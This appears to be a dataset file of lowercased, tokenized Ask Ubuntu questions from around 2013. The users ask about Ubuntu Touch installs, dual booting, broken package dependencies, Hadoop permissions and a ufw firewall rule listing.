315516	my ubuntu touch seems to be broken no matter how many different files i try	so i 'm planning on testing out ubuntu touch , and developing some applications for it so i thought i would flash it to my nexus 4 that was already unlocked , and running paranoid android and the kernel associated . i headed to ubuntu 's website , browsed around and came across this page : touch/install - ubuntu wiki i followed step 1 perfectly , word by word . its seems to me that everything on that part is fine . i skipped step 2 having already done that for paranoid android , and then i follow 3 and 4 word to word also . using the command phablet-flash -b everything seemed to be fine . so it booted up and all seemed normal , but it was n't . here are some major bugs that only seem to happen to me . so i was greeted with a normal lock screen : but one of the first noticable things on the home screen is that i only have 4 tabs , not 5 : some of the applications that are supposed to work do not ( i know some are dummies ) like here with the calculator , this is what i get : on the homescreen it is a black box , it will crash a couple of seconds later : another annoying problem is that when i want to close apps , i have from right to left , if i close an app on the left first it will close it , but it will open the app to it 's right , weird : yet another bug , this one is in the pull down drawer , when you just click on it , you can see that not all the icons are there : pretty much everything else works as it should , but my main problem is that there is no telephony , i 'm not sure how it works exactly , but i 'm never asked a sim code ( i 'm guessing you need that ? ) , i ca n't compose sms 's and ca n't dial numbers , it wo n't let me select the 'send ' or 'call ' button . i 've after tried manual installs all over the place with these files : http : //cdimage.ubuntu.com/ubuntu-touch-preview/daily-preinstalled/current/saucy-preinstalled-armel+mako.zip ( says 44mb on site - 46.6mb on my laptop ) http : //cdimage.ubuntu.com/ubuntu-touch-preview/daily-preinstalled/current/saucy-preinstalled-phablet-armhf.zip ( says 366mb on site - 383.2mb on my laptop ) there are some weird size differences between what the site told me and what i downloaded , but i 've tried re-downloading just to end up with the same file . and it just alway ends up with the same problems . no telephony and those weird bugs . so my question is , how the hell can i get the same version as everyone else , with the ability to send texts and call and open the calculator and more ? also , definitely running saucy : and maybe useful ? this is what 's in the device info :
315518	purple/pink lines on screen after login on ubuntu desktop 13.04	i downloaded ubuntu 13.04 and i loaded up the live system . it loaded up fine but when i clicked on the ubuntu logo purple and pink lines appeared on screen and they did n't go away so i thought that if i installed the os it would be fine so i installed the os , logged in and lo and behold the purple and pink lines where back . my video card is nvidia n force ( i think ) anyone having the same problem ? ? ?
315519	post-retirement plans for ruby package in precise 12.04lts ?	now that ruby 1.8.7 is officially retired , is it at all possible that the default ruby package in precise might be updated all the way up to 2.0 ? i understand that backporting is generally not done with ubuntu releases for concerns of breaking people , but in this case we 're dealing with a deprecated package that might either already have security issues , or have more of them discovered in the future without any chance of them being fixed . what 's the plan ? will 12.04 march on with 1.8.7 ?
315520	xen issues in wubi ubuntu 12.10	i have installed ubuntu 12.10 on my windows 7 from wubi . now i want to install xen on it . i have searched a lot and read many blog . i tried to install but when i run a command xm list to check whether xen is install or not it gives me error that it cant find hypervisor . update grub command now not working as i have changed many things so should i reinstall from wubi ? is installing xen on wubi a problem ? should i install ubuntu from live cd or without wubi ? will my windows crashed if install ubuntu without wubi ? my main objective is to install xen on ubuntu.please help me
315524	how to increase the disk partition size ?	i desperately need to increase the size of a partition.i am running ubuntu with dual boot ( windows , no wubi ) . two hard disk partition c : windows d : i do n't know how but d : is separated into 3 spaces.one contains ubuntu -- > linux swap and ntfs.when right clicking on ubuntu disk i am not getting any option to increase size . i want the safest solution . i can create space in c : or d : .
315528	how can i tell if all the hardware in my system has correctly installed drivers ?	i 'm working on making the switch from windows to ubuntu . does ubuntu have an equivalent to `` device manager '' ? what i want to do is check if all of the hardware in the machine has correctly installed drivers . ( without having to run a plethora of individual lsusb , lspci , modprobe , etc . i 'm not quite there yet . )
315536	is there a plugin that makes rhythmbox smart playlists more like itunes ?	i 'm in the process of moving completely to linux and i noticed that rhytmboxs smart playlist functionality is lacking one key feature ( for me at least ) , that 's the sub arguments , ( i think that 's what they 're called ) in itunes there are two levels to the smart playlists but in rhythmbox there is just one . is there a plugin that will allow me this extra functionality .
315538	compiling software generated with an old version of qt designer	i 'm trying to compile and install k3dsurf following the instructions in the `` readme '' , which says : tar -xvzf k3dsurf-0.6.2.tar.gz ; cd k3dsurf ; qmake ; make ; ./bin/k3dsurf & ; the problem is that when i execute make , the following error message appears : cd src/ & & make -f makefile make [ 1 ] : entering directory /home/miguel/downloads/k3dsurf-0.6.2/src' /usr/lib/x86_64-linux-gnu/qt4/bin/uic k3dsurf.ui -o ui_k3dsurf.h uic : file generated with too old version of qt designer ( 3.3 ) file 'k3dsurf.ui ' is not valid make [ 1 ] : *** [ ui_k3dsurf.h ] error 1 make [ 1 ] : leaving directory/home/miguel/downloads/k3dsurf-0.6.2/src' make : * [ sub-src-make_default ] error 2 thanks
315540	no grub promt after dual boot installation	i decided to install ubuntu 12.04 alongside win 7 , which is a primary system . i downloaded , checksumed , and burned iso to dvd . then i installed ubuntu using general instruction , the only thing i changed was allowing manager to partition disk space automatically ( though i shifted to 200 gb out of 300 gb , not sure how much i need ) . after completion i rebooted system , and with dvd off machine it launched win 7 without prompting me . turning on dvd , it again asked me to install ubuntu . the problem is that it took off those 200 gbs out of hard drive on win 7 . so first , what the problem might be ? did it happen because i partitioned wrongly ? i 'm actually not sure , when i asked to allocate space , is it size of hard drive that can be used to install programs , or it 's just to install ubuntu onto that ? now when i decided to reinstall ubuntu using other instructions , how can i find out what partition was allocated on ubuntu on win 7 , in order to manually allocate space next time ? my final goal is to allocate enough space for all programs on ubuntu ( as i understood i 'm not able to use programs from win 7 ) . if for instance i want to have 300 gbs , should i pass that much space during installation ?
315550	how do i remove a startup application from the command line ?	in xubuntu , how do i remove a startup application that was set in menu – > setting – > settings manager – > sessions and startup without using the gui ? my startup command breaks the gui , and i need to disable it using the command line .
315551	windows xp does't let me chose ubuntu using an usb	i have downloaded ubuntu 13.04 in a pen-drive , but when i restart the computer , it does n't let mi choose .
315553	is it possible to add ctan directory as a software source to the packet manager muon ?	i am using muon as a packet manager with kubuntu . normally everything works just fine , but i have some difficulties with latex packages . muon does not seem to find the latest versions . on ctan there is a version from june 2013 , while muon tells me that my version from 2012 is up to date . i could install it manually , of course ; but it is not that practical since i use latex a lot and would like to have all updates as soon as possible . i noticed that it is possible to add new repositories to muon , and i considered adding the whole ctan directory to the muon sources . but i do not know if that is necessary or even possible , plus i do n't really understand the menu for adding repositories .
315560	ubuntu sdk has no c++ examples	are there any c++ examples ? new project > ubuntu > only allows simple qml apps . there is much , much more to tablets than some fancy buttons and a few lines of java script ! if c++ is deprecated , please say so . thanks .
315567	can i install ubuntu over vista on a laptop computer ?	can i install ubuntu os over the vista os on a compaq laptop . are there any instructions out there for this ? ? ?
315570	package requirements does n't make any sense	when trying to install the latest minitube-ubuntu from the ubuntu repository : the following packages have unmet dependencies : minitube-ubuntu : depends : libc6 ( > = 2.14 ) but 2.17-0ubuntu5 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.7.3-1ubuntu1 is to be installed depends : libphonon4 ( > = 4:4.2.0 ) but 4:4.7.0really4.6.0-0ubuntu2 is to be installed depends : libqt4-dbus ( > = 4:4.5.3 ) but 4:4.8.4+dfsg-0ubuntu9.1 is to be installed depends : libqt4-network ( > = 4:4.5.3 ) but 4:4.8.4+dfsg-0ubuntu9.1 is to be installed depends : libqt4-sql ( > = 4:4.5.3 ) but 4:4.8.4+dfsg-0ubuntu9.1 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.4+dfsg-0ubuntu9.1 is to be installed depends : libqtgui4 ( > = 4:4.8.0 ) but 4:4.8.4+dfsg-0ubuntu9.1 is to be installed depends : libstdc++6 ( > = 4.2.1 ) but 4.7.3-1ubuntu1 is to be installed depends : phonon-backend-gstreamer but it is not going to be installed seems to me that 2.17 > = 2.14 , but maybe math is different on unix-like systems ? : ( what can i do to resolve these dependencies ? following a suggestion i tried to install phonon-backend-gstreamer sudo apt-get install phonon-backend-gstreamer [ sudo ] password for gilnaa : reading package lists ... done building dependency tree reading state information ... done package phonon-backend-gstreamer is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'phonon-backend-gstreamer ' has no installation candidate software sources : # deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) ] / raring main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //il.archive.ubuntu.com/ubuntu/ raring main restricted deb-src http : //il.archive.ubuntu.com/ubuntu/ raring main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //il.archive.ubuntu.com/ubuntu/ raring-updates main restricted deb-src http : //il.archive.ubuntu.com/ubuntu/ raring-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //il.archive.ubuntu.com/ubuntu/ raring universe deb-src http : //il.archive.ubuntu.com/ubuntu/ raring universe deb http : //il.archive.ubuntu.com/ubuntu/ raring-updates universe deb-src http : //il.archive.ubuntu.com/ubuntu/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //il.archive.ubuntu.com/ubuntu/ raring multiverse deb-src http : //il.archive.ubuntu.com/ubuntu/ raring multiverse deb http : //il.archive.ubuntu.com/ubuntu/ raring-updates multiverse deb-src http : //il.archive.ubuntu.com/ubuntu/ raring-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //il.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb-src http : //il.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu raring-security main restricted deb-src http : //security.ubuntu.com/ubuntu raring-security main restricted deb http : //security.ubuntu.com/ubuntu raring-security universe deb-src http : //security.ubuntu.com/ubuntu raring-security universe deb http : //security.ubuntu.com/ubuntu raring-security multiverse deb-src http : //security.ubuntu.com/ubuntu raring-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu raring partner # deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main deb-src http : //extras.ubuntu.com/ubuntu raring main deb http : //archive.canonical.com/ raring partner # deb-src http : //archive.canonical.com/ raring partner # mono and stuff . deb http : //ppa.launchpad.net/geany-dev/ppa/ubuntu raring main # deb-src http : //ppa.launchpad.net/geany-dev/ppa/ubuntu raring main contents of /etc/apt/sources.list.d/ canonical-qt5-edgers-qt5-proper-raring.list satyajit-happy-themes-raring.list canonical-qt5-edgers-qt5-proper-raring.list.save satyajit-happy-themes-raring.list.save dropbox.list skype-wrapper-ppa-raring.list dropbox.list.save skype-wrapper-ppa-raring.list.save elementary-os-daily-raring.list steam.list elementary-os-daily-raring.list.save steam.list.save fioan89-slidewall-raring.list tiheum-equinox-raring.list fioan89-slidewall-raring.list.save tiheum-equinox-raring.list.save google-chrome.list tomahawk-ppa-raring.list google-chrome.list.save tomahawk-ppa-raring.list.save google-talkplugin.list ubuntu-sdk-team-ppa-raring.list google-talkplugin.list.save ubuntu-sdk-team-ppa-raring.list.save jconti-recent-notifications-raring.list upubuntu-com-gtk_3_6-raring.list jconti-recent-notifications-raring.list.save upubuntu-com-gtk_3_6-raring.list.save liferea-development-raring.list upubuntu-com-icons2-raring.list liferea-development-raring.list.save upubuntu-com-icons2-raring.list.save opera.list upubuntu-com-nitrux-raring.list opera.list.save upubuntu-com-nitrux-raring.list.save private-ppa.launchpad.net_commercial-ppa-uploaders_minitube-ubuntu_ubuntu.list webupd8team-java-raring.list private-ppa.launchpad.net_commercial-ppa-uploaders_steam_ubuntu.list webupd8team-java-raring.list.save private-ppa.launchpad.net_commercial-ppa-uploaders_steam_ubuntu.list.save
315575	am i permitted to create custom metapackages in ppas ?	in my university , we want to create metapackages to provide all the software used in the differents careers , and signatures . 多we can do this ? i ask because recently i read this : '' note : we will not accept uploads of packages that are unmodified from their original source in ubuntu or debian , only packages that include your own changes . we ask that people include useful changelogs for each package so that users and other developers can understand what new features they are exploring in their work . read the ppa terms of use for more information . '' https : //help.launchpad.net/packaging/ppa/uploading basicly we do n't want to change the source code of the package , we only want to do a `` compilation '' .
315576	i need to use sudo for any hadoop operation , how to change permissions ?	i am self learning hadoop , starting yesterday . for the purpose of learning , i have set up ubuntu 13.04 64-bit on vmware fusion on my macbook pro . and i am following this excellent tutorial . before this i have never used ubuntu as a development platform . so far i have managed to set up hadoop and have successfully run the wordcount example . but along the way , i have to use sudo to do anything , e.g . starting up hadoop services : /usr/local/hadoop/hadoop-1.1.2/bin/start-all.sh never works , giving exceptions , but sudo /usr/local/hadoop/hadoop-1.1.2/bin/start-all.sh works fine . same is the case with stop-all.sh and for practically anything else . additionally , while starting hadoop services , the os asks for password multiple times ( once before starting each component ) and same happens when i use stop-all.sh . i could not copy the downloaded files to /usr/local/hadoop using the ui . i had to copy them using the terminal using sudo . if i open '/usr/local ' in the ui , there is no permission to copy , move , delete or create new folder . and i searched how to change permissions , but for this folder , the owner is not the logged in user , but it was root , so the ui for setting permissions was disabled . and one can not log in as root and use the ui logged in as root . also when came the stage of adding congfigurations to /usr/local/hadoop/bin/start-all.sh , conf/mapred-site.xml and conf/hdfs-site.xml , i could not save the edits using gedit , and had to make changes using nano ( preceded by sudo ) , which was again due to permissions . one thing different in my setup is that instead of /usr/local/hadoop/ , i have used /usr/local/hadoop/hadoop-1.1.2/ as the extraction folder of hadoop . my questions are : how to add to permissions so that i can use the ui , and gedit or any editor of my choice ? how to make all the commands run without sudo ? and a slightly non-related question , what is the best ide for hadoop ? coming from visual studio and xcode , i am looking for a free ide which i can use while getting used to of doing things using the terminal and using gedit for simple changes in the code ?
315580	how does the display server - display manager - window manager structure exactly work ?	i would like to know what exactly each does and how they are layered/structured or interrelated to each other , their functions , their interdependence , their communication protocols and when and why they interact and all that stuff ! i would really appreciate a detailed answer , for 2 reasons - m not very well at this part . the display servers and all , and , all users who encounter this question and the answer can know everything ! thankyou ! : )
315584	the package system is broken : can not update or install new packages	i am not new to ubuntu , but i don '' t know what to do with the following : sudo apt-get -o debug : :pkgproblemresolver=yes dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libqt4-declarative : depends : libqtgui4 ( = 4:4.8.4+dfsg-0ubuntu9.1 ) but 4:4.8.4+dfsg-0ubuntu9.1~ubuntu13.04~ppa1 is installed libqt4-designer : depends : libqtgui4 ( = 4:4.8.4+dfsg-0ubuntu9.1 ) but 4:4.8.4+dfsg-0ubuntu9.1~ubuntu13.04~ppa1 is installed libqt4-help : depends : libqtgui4 ( = 4:4.8.4+dfsg-0ubuntu9.1 ) but 4:4.8.4+dfsg-0ubuntu9.1~ubuntu13.04~ppa1 is installed libqt4-opengl : depends : libqtgui4 ( = 4:4.8.4+dfsg-0ubuntu9.1 ) but 4:4.8.4+dfsg-0ubuntu9.1~ubuntu13.04~ppa1 is installed libqt4-qt3support : depends : libqtgui4 ( = 4:4.8.4+dfsg-0ubuntu9.1 ) but 4:4.8.4+dfsg-0ubuntu9.1~ubuntu13.04~ppa1 is installed libqt4-scripttools : depends : libqtgui4 ( = 4:4.8.4+dfsg-0ubuntu9.1 ) but 4:4.8.4+dfsg-0ubuntu9.1~ubuntu13.04~ppa1 is installed libqt4-svg : depends : libqtgui4 ( = 4:4.8.4+dfsg-0ubuntu9.1 ) but 4:4.8.4+dfsg-0ubuntu9.1~ubuntu13.04~ppa1 is installed libqtgui4 : depends : libqt4-declarative ( = 4:4.8.4+dfsg-0ubuntu9.1~ubuntu13.04~ppa1 ) but 4:4.8.4+dfsg-0ubuntu9.1 is installed depends : libqtcore4 ( = 4:4.8.4+dfsg-0ubuntu9.1~ubuntu13.04~ppa1 ) but 4:4.8.4+dfsg-0ubuntu9.1 is installed breaks : libqtgui4 : i386 ( ! = 4:4.8.4+dfsg-0ubuntu9.1~ubuntu13.04~ppa1 ) but 4:4.8.4+dfsg-0ubuntu9.1 is installed libqtgui4 : i386 : breaks : libqtgui4 ( ! = 4:4.8.4+dfsg-0ubuntu9.1 ) but 4:4.8.4+dfsg-0ubuntu9.1~ubuntu13.04~ppa1 is installed e : unmet dependencies . try using -f. i can not update or install any packages . please help , what i should do.. i tried also this : sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libqtgui4 suggested packages : qt4-qtconfig the following packages will be upgraded : libqtgui4 1 upgraded , 0 newly installed , 0 to remove and 56 not upgraded . 5 not fully installed or removed . need to get 0 b/3.992 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 336705 files and directories currently installed . ) preparing to replace libqtgui4 : amd64 4:4.8.4+dfsg-0ubuntu9.1~ubuntu13.04~ppa1 ( using ... /libqtgui4_4 % 3a4.8.4+dfsg-0ubuntu9.1_amd64.deb ) ... unpacking replacement libqtgui4 : amd64 ... dpkg : error processing /var/cache/apt/archives/libqtgui4_4 % 3a4.8.4+dfsg-0ubuntu9.1_amd64.deb ( -- unpack ) : trying to overwrite shared '/usr/share/doc/libqtgui4/lgpl_exception.txt ' , which is different from other instances of package libqtgui4 : amd64 errors were encountered while processing : /var/cache/apt/archives/libqtgui4_4 % 3a4.8.4+dfsg-0ubuntu9.1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
315585	can i install ubuntu on a computer that has no operating system ?	i have an old laptop that has had system32 deleted . is it possible to install ubuntu , and if so how ? thank you !
315586	how to setup wifi direct	i am trying to configure wifi direct to connect to a 4.1 android phone . what are the correct steps to setup and configure wifi direct to connect to a phone that supports the same feature .
315602	virtualbox very slow | io	kubuntu 12.04.02 virtualbox 4.2 x64 | ubuntu ppa does the same problem : windows xp 32bit guest extremely slow hdd io appears to be on full load virtualbox spec : display ram 128mb 2d enabled ide 32 bit guest additions installed changed and checked i/o cache settings when running virtualbox from terminal it says `` e*rror opening file for reading : permission denied* '' this seems to be related to kde cache should not be a pc /hardware issue , checked different hdd with same result . cpu is intel i5 2500k slightly overclocked . z68 mainboard chip ( checked sata 2 & 3 ports )
315604	configure nemo on ubuntu 13.04	i have made nemo default file browser in ubuntu 13.04 ( unity ) . everything works fine . but i can not find how to remove trash from desktop . i tried gconf-editor but nemo is not there . how can i remove trash from desktop ? probably something similar to : gsettings set org.nemo.desktop show-desktop-trahs ? ? ? ? false ?
315608	xrvt-unicode does n't display unicode characters	i do not why rxvt-unicode does n't display some unicode characters correctly such as ☁ or ☂ while ⚡ is displayed correctly . these symbols are replaced by a little box as you can see in the screenshot here 's my locale : lang=en_us.utf-8 language=en_us : en lc_ctype=en_us.utf-8 lc_numeric=en_us.utf-8 lc_time=en_us.utf-8 lc_collate= '' en_us.utf-8 '' lc_monetary=en_us.utf-8 lc_messages= '' en_us.utf-8 '' lc_paper=en_us.utf-8 lc_name=en_us.utf-8 lc_address=en_us.utf-8 lc_telephone=en_us.utf-8 lc_measurement=en_us.utf-8 lc_identification=en_us.utf-8 lc_all= and here my .xresources : urxvt.font : xft : ubuntu mono : size=11 : antialias=true : hinting=true urxvt.letterspace : -2 urxvt.linespace : -2 urxvt.scrollkey : true urxvt.depth : 32 urxvt.loginshell : true urxvt.geometry : 100x30 urxvt.savelines : 10000 urxvt.cutchars : `` `\ '' ' & ( ) * , : ; < = > ? [ \\ ] ^ { | } $ '' urxvt.scrollbar : false urxvt.visualbell : true `` ` these symbols are displayed correctly in gnome-terminal . suggestions from google are not ubuntu-related and they all suggest to add .utf-8 to locale , which i already have in my settings . if you can help me in any way it would be awesome , this problem is really bugging me ! thanks for your support .
315609	how do install windows 8 in ubuntu ?	i want to install windows 8 alongside ubuntu ( my default and only operating system ) , but i am not sure how . can someone explain ? can i virtualize windows 8 or is there another way . i want windows 8 mostly for staying ahead of the game and helping people with their windows 8 questions . so far , i have installed virtual box , but it has given me an error . again , i do n't want to get rid of ubuntu ( i love ubuntu ) , i just want to have the other operating system there if i need it .
315613	`` the software on this computer is up to date '' while upgrading 12.10 to 13.04	before you guys close this question as duplicate , i did go through how do i upgrade from 12.10 to 13.04 ? and nothing solves my problem there . when i try to upgrade my ubuntu 12.10 installation it says the software on this computer is up to date . there are no upgrades available for your system . the upgrade will now be canceled . here 's a snapshot : question : how to fix this issue and upgrade 12.10 to 13.04 ? update i tried @ montazeri 's command and cated release file . here 's the output :
315614	ufw firewall rules , has a hole in it . please help	can someone please look at the below output for me . i have my ufw on deny/deny , and here are the rules . but if i leave my ubuntu server on , with a windows xp vm , and let instant messenger run in the windows xp for a long time , it still sometimes connects for a few seconds and send/recieves messages . is there a hole in my configuration ? i appreciate your help my ufw rules ( is there a hole in here , somewhere ? ) root @ myubuntuserver1204 : ~ # iptables -l -v chain input ( policy drop 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination 2449k 2659m ufw-before-logging-input all -- any any anywhere anywhere 2449k 2659m ufw-before-input all -- any any anywhere anywhere 5100 195k ufw-after-input all -- any any anywhere anywhere 5038 186k ufw-after-logging-input all -- any any anywhere anywhere 5038 186k ufw-reject-input all -- any any anywhere anywhere 5038 186k ufw-track-input all -- any any anywhere anywhere chain forward ( policy drop 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination 0 0 ufw-before-logging-forward all -- any any anywhere anywhere 0 0 ufw-before-forward all -- any any anywhere anywhere 0 0 ufw-after-forward all -- any any anywhere anywhere 0 0 ufw-after-logging-forward all -- any any anywhere anywhere 0 0 ufw-reject-forward all -- any any anywhere anywhere chain output ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination 2201k 163m ufw-before-logging-output all -- any any anywhere anywhere 2201k 163m ufw-before-output all -- any any anywhere anywhere 358k 29m ufw-after-output all -- any any anywhere anywhere 358k 29m ufw-after-logging-output all -- any any anywhere anywhere 358k 29m ufw-reject-output all -- any any anywhere anywhere 358k 29m ufw-track-output all -- any any anywhere anywhere chain ufw-after-forward ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-after-input ( 1 references ) pkts bytes target prot opt in out source destination 0 0 ufw-skip-to-policy-input udp -- any any anywhere anywhere udp dpt : netbios-ns 0 0 ufw-skip-to-policy-input udp -- any any anywhere anywhere udp dpt : netbios-dgm 0 0 ufw-skip-to-policy-input tcp -- any any anywhere anywhere tcp dpt : netbios-ssn 0 0 ufw-skip-to-policy-input tcp -- any any anywhere anywhere tcp dpt : microsoft-ds 0 0 ufw-skip-to-policy-input udp -- any any anywhere anywhere udp dpt : bootps 0 0 ufw-skip-to-policy-input udp -- any any anywhere anywhere udp dpt : bootpc 0 0 ufw-skip-to-policy-input all -- any any anywhere anywhere addrtype match dst-type broadcast chain ufw-after-logging-forward ( 1 references ) pkts bytes target prot opt in out source destination 0 0 log all -- any any anywhere anywhere limit : avg 3/min burst 10 log level warning prefix `` [ ufw block ] `` chain ufw-after-logging-input ( 1 references ) pkts bytes target prot opt in out source destination 0 0 log all -- any any anywhere anywhere limit : avg 3/min burst 10 log level warning prefix `` [ ufw block ] `` chain ufw-after-logging-output ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-after-output ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-before-forward ( 1 references ) pkts bytes target prot opt in out source destination 0 0 ufw-user-forward all -- any any anywhere anywhere chain ufw-before-input ( 1 references ) pkts bytes target prot opt in out source destination 22 2230 accept all -- lo any anywhere anywhere 203 175k accept all -- any any anywhere anywhere state related , established 0 0 ufw-logging-deny all -- any any anywhere anywhere state invalid 0 0 drop all -- any any anywhere anywhere state invalid 0 0 accept icmp -- any any anywhere anywhere icmp destination-unreachable 0 0 accept icmp -- any any anywhere anywhere icmp source-quench 0 0 accept icmp -- any any anywhere anywhere icmp time-exceeded 0 0 accept icmp -- any any anywhere anywhere icmp parameter-problem 0 0 accept icmp -- any any anywhere anywhere icmp echo-request 0 0 accept udp -- any any anywhere anywhere udp spt : bootps dpt : bootpc 0 0 ufw-not-local all -- any any anywhere anywhere 0 0 accept udp -- any any anywhere 224.0.0.251 udp dpt : mdns 0 0 accept udp -- any any anywhere 239.255.255.250 udp dpt:1900 0 0 ufw-user-input all -- any any anywhere anywhere chain ufw-before-logging-forward ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-before-logging-input ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-before-logging-output ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-before-output ( 1 references ) pkts bytes target prot opt in out source destination 22 2230 accept all -- any lo anywhere anywhere 209 28984 accept all -- any any anywhere anywhere state related , established 29 1798 ufw-user-output all -- any any anywhere anywhere chain ufw-logging-allow ( 0 references ) pkts bytes target prot opt in out source destination 0 0 log all -- any any anywhere anywhere limit : avg 3/min burst 10 log level warning prefix `` [ ufw allow ] `` chain ufw-logging-deny ( 2 references ) pkts bytes target prot opt in out source destination 0 0 return all -- any any anywhere anywhere state invalid limit : avg 3/min burst 10 0 0 log all -- any any anywhere anywhere limit : avg 3/min burst 10 log level warning prefix `` [ ufw block ] `` chain ufw-not-local ( 1 references ) pkts bytes target prot opt in out source destination 0 0 return all -- any any anywhere anywhere addrtype match dst-type local 0 0 return all -- any any anywhere anywhere addrtype match dst-type multicast 0 0 return all -- any any anywhere anywhere addrtype match dst-type broadcast 0 0 ufw-logging-deny all -- any any anywhere anywhere limit : avg 3/min burst 10 0 0 drop all -- any any anywhere anywhere chain ufw-reject-forward ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-reject-input ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-reject-output ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-skip-to-policy-forward ( 0 references ) pkts bytes target prot opt in out source destination 0 0 drop all -- any any anywhere anywhere chain ufw-skip-to-policy-input ( 7 references ) pkts bytes target prot opt in out source destination 0 0 drop all -- any any anywhere anywhere chain ufw-skip-to-policy-output ( 0 references ) pkts bytes target prot opt in out source destination 0 0 accept all -- any any anywhere anywhere chain ufw-track-input ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-track-output ( 1 references ) pkts bytes target prot opt in out source destination 19 1140 accept tcp -- any any anywhere anywhere state new 10 658 accept udp -- any any anywhere anywhere state new chain ufw-user-forward ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-user-input ( 1 references ) pkts bytes target prot opt in out source destination 0 0 drop tcp -- any any anywhere anywhere tcp dpt:51413 0 0 drop udp -- any any anywhere anywhere udp dpt:51413 0 0 drop tcp -- any any anywhere anywhere tcp dpt : https 0 0 drop tcp -- any any anywhere anywhere tcp dpt:6881 0 0 drop udp -- any any anywhere anywhere udp dpt:6881 0 0 drop tcp -- any any anywhere anywhere multiport dports 2234:2239 0 0 drop tcp -- any any anywhere anywhere tcp dpt:2242 0 0 drop tcp -- any any anywhere anywhere tcp dpt:2240 0 0 drop udp -- any any anywhere anywhere udp dpt:4444 0 0 drop tcp -- any any anywhere anywhere multiport dports 6881:6891 0 0 drop udp -- any any anywhere anywhere multiport dports 6881:6891 0 0 drop tcp -- any any anywhere anywhere tcp dpt:4662 0 0 drop udp -- any any anywhere anywhere udp dpt:4672 0 0 drop tcp -- any any anywhere anywhere tcp dpt : domain 0 0 drop udp -- any any anywhere anywhere udp dpt : domain 0 0 drop tcp -- any any anywhere anywhere tcp dpt : ipp /* 'dapp_cups ' */ 0 0 drop udp -- any any anywhere anywhere udp dpt : ipp /* 'dapp_cups ' */ chain ufw-user-limit ( 0 references ) pkts bytes target prot opt in out source destination 0 0 log all -- any any anywhere anywhere limit : avg 3/min burst 5 log level warning prefix `` [ ufw limit block ] `` 0 0 reject all -- any any anywhere anywhere reject-with icmp-port-unreachable chain ufw-user-limit-accept ( 0 references ) pkts bytes target prot opt in out source destination 0 0 accept all -- any any anywhere anywhere chain ufw-user-logging-forward ( 0 references ) pkts bytes target prot opt in out source destination chain ufw-user-logging-input ( 0 references ) pkts bytes target prot opt in out source destination chain ufw-user-logging-output ( 0 references ) pkts bytes target prot opt in out source destination chain ufw-user-output ( 1 references ) pkts bytes target prot opt in out source destination
315615	ubuntu create user with password in gui	chen creating a new user in the ubuntu gui , it only asks for the users full name , username , and account type . it does not ask for a password . but when i try to switch to the new user it asks for a password . how do i set the password ( in the gui ) , or login as the new user ?
315621	su : authentication failure	i have downloaded the eset nod32 antivirus from its website , and i got a eset_nod32av_64bit_en.linux file . i have right-clicked on it , properties - permissions , and checked the allow executing file as program option . then i was able to run the program . the installer starts and it asks for my root password . i enter it correctly , but then i get the following error message : su : authentication failure . what can i do with this to install the nod32 ?
315623	deleting a file from an user account when only the guest account is accessible	i was trying stuff and my cousin ( owning applestuff ) sent me a bash_profile file . i replaced it with my old profile file ( the one you find in home , .profile ) - i backed up the existing one as `` .profile ( old ) '' i am now unable to sign in to my account , and can only log in using the guest account . how can i access my old account files to restore the backup i made ?
315625	how to disable the shortcut ctrl-alt-arrow in gnome 3.8	i mapped ctrl-alt-up/down to open webbrowser and email client but it did n't take effect . ctrl-alt-up/down still switch workspaces as the default setting of gnome 3.8 . i have tried log-out/log-in . no good .
315627	add repository in ubuntu12.04.2	i have installed ubuntu 12.04.2 ( precise pangolin ( 64bit ) ) in vm workstation on windows 7 . i am trying to run cmd `` sudo add-apt-repository âdeb http : //archive.canonical.com/ maverick partnerâ '' . but it is giving me error : need a repository . please reply with correct form of this cmd.also i need to install java6 or 7 in this .
